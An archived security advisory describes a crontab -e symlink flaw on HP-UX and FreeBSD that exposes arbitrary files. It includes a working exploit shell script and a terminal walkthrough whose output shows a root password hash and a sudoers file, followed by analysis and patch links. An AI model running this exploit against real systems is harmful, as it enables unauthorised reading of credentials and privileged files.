COMMAND

    crontab

SYSTEMS AFFECTED

    HpUX 10.20, 11.00, FreeBSD

PROBLEM

    Following  is  based  on  a  Hackerslab  bug_paper.   There  is  a
    vulneribility in "crontab"  which allows users  to read all  files
    without attaining root or file ownership privileges.

    The "crontab" command can't be run by any user in general however,
    users that are  registered in crontab.allow  are permitted to  run
    the command.

    Using the crontab command with the -e option (crontab -e)  excutes
    vi editor and a temporary file is created in /var/tmp/.  The owner
    of the file is a current user.

    Make a  subshell by  using !sh  command in  vi and  link the  file
    created in /var/tmp/  then exit crontab.   Then the error  message
    appears with all the file names and details.

    Example: display the contents of /tcb/files/auth/r/root

        $ id
        uid=101(dubhe) gid=101(swat)
        $uname -s -r
        HP-UX B.11.00



        $ crontab -e
        ...
        ...
        ~
        "/var/tmp/aaaa25923"

        ### A file named  /var/tmp/aaaa25923 is created

        ~
        :!sh

        ### Make a subshell

        $ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923
        $ exit

        ### Make symlink and return vi

        [Hit return to continue]
        :q!

        ### Quit vi

        root:u_name=root:u_id#0:\
        crontab: error on previous line; unexpected character found in line.
                :u_pwd=Of2wgf6SCoIbQ:\
        crontab: error on previous line; unexpected character found in line.
                :u_bootauth:u_auditid#0:\
        crontab: error on previous line; unexpected character found in line.
                :u_auditflag#1:\
        crontab: error on previous line; unexpected character found in line.
                :u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\
        crontab: error on previous line; unexpected character found in line.
                :chkent:
        crontab: error on previous line; unexpected character found in line.

    Here's a exploit:

    #!/bin/sh
    #
    #  HP-UX 11.00 crontab
    #
    #  Kyong-won,Cho
    #
    #             dubhe@hackerslab.com
    #
    #  Usage : ./crontab.sh <distfile>
    #
    #

    if [ -z "$1" ]
    then

    echo "Usage : $0 <distfile>"
    exit

    fi

    cat << _EOF_ > /tmp/crontab_exp
    #!/bin/sh

    ln -sf $1 \$1

    _EOF_

    chmod 755 /tmp/crontab_exp

    EDITOR=/tmp/crontab_exp
    export EDITOR

    crontab -e 2> /tmp/crontab$$

    grep -v "error on previous line" /tmp/crontab$$

    rm -f /tmp/crontab_exp /tmp/crontab$$

    When tested on

        - 4.0-RELEASE FreeBSD 4.0-RELEASE #9
        - 4.1-RELEASE FreeBSD 4.1-RELEASE #1:

    You can read any file wich start with comment simbol (#):

        $ ls -l /etc/sudoers
        -r--------  1 root  wheel  313 24 oct 20:20 /etc/sudoers
        $ id
        uid=1002(alf) gid=1002(alf) groups=1002(alf)


        $ crontab -e
        ~
        ~
        ~
        /tmp/crontab.hLmjTbK417
        :!sh

        [ ####  Make simbolik link]
        > rm /tmp/crontab.hLmjTbK417
        > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
        > exit

        [ #### quit vi ]
        /tmp/crontab.hLmjTbK417
        crontab: installing new crontab

        [ #### start crontab editor]

        $ crontab -e
        [#######   See in vi]
        # sudoers file.
        #
        # This file MUST be edited with the 'visudo' command as root.
        #
        # See the sudoers man page for the details on how to write a sudoers
        file.
        #

        # Host alias specification

        # User alias specification

        # Cmnd alias specification

        # User privilege specification
        root    ALL=(ALL) ALL
        alf     ALL=(ALL) ALL
        ~
        ~
        ~

    If file started with no # then crontab sad

        "/tmp/crontab.GAeNMP1357":2: bad minute
         crontab: errors in crontab file, can't install

    Dec/Compaq unpatched 4.0d is vulnerable, but it was pointed out to
    that 4.0d with recommended patches is not vulnerable.  4.0g is not
    vulnerable as well.

    FreeBSD 3.3 and FreeBSD 2.2.8 seem to be vulnerable as well.

    At least on  our version of  Vixie Cron, this  description appears
    to be inaccurate on an initial  inspection.  Yes, there is a  bug,
    and a serious one, but  the syntax requirements are much  stronger
    than those that are described  above: the file must fully  conform
    to a valid crontab file  specification.  I.e., the sample  sudoers
    file  included  in  the  paper  will  not  work  in  FreeBSD as it
    violates  crontab  formatting  specifications;  this substantially
    limits  the  impact  of  this  bug  for  the purposes of acquiring
    additional privilege.   Off-hand, here  are some  things that  are
    *not* readable due to standard formatting of the files:

        - /etc/ssh/ssh_host_key
        - /etc/ssh/ssh_dsa_host_key
        - /etc/ssl/mykey.prv
        - /tmp/ssh-GbQ60456/cookies
        - /etc/master.passwd
        - /etc/spwd.db
        - /home/rwatson/.ssh/identity
        - /home/rwatson/.netscape/preferences.js
        - /home/rwatson/.pgp/secring.skr
        - /home/tkt1000

    Here are some things that are readable:

        - /var/cron/tabs/arbitraryuser
        - Files that are entirely commented using '#', optionally with blank lines
        - Binary files that start with a # and contain no linefeeds
        - Empty files

    So  in  the  situations  investigated  thus  far,  this  cannot be
    leveraged to gain additional privielge in a plain vanilla  FreeBSD
    system, as private  keying material in  the base system  typically
    requires a  tightly formatted  key storage  file that  necessarily
    precludes valid crontab file formatting.  It can be use to extract
    any keying material from crontab command lines of other users, but
    users should not be storing  stuff there anyway as generally  that
    can be extracted using  ps.  It can  be used to read  entirely #'d
    files  which  could  be  an  issue  in  some  configurations:  for
    example,   if   the   administrator   added   shared   secrets  to
    /etc/ppp/ppp.conf and then commented out the entire file.

    Tested against also a Slackware 3.0 = Vulnerable.

SOLUTION

    For FreeBSD:

        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch

    For Debian:

        http://security.debian.org/dists/stable/updates/main/source/cron_3.0pl1.orig.tar.gz
        http://security.debian.org/dists/stable/updates/main/source/cron_3.0pl1-57.2.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/cron_3.0pl1-57.2.dsc
        http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.2_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.2_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.2_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.2_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.2_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.2_arm.deb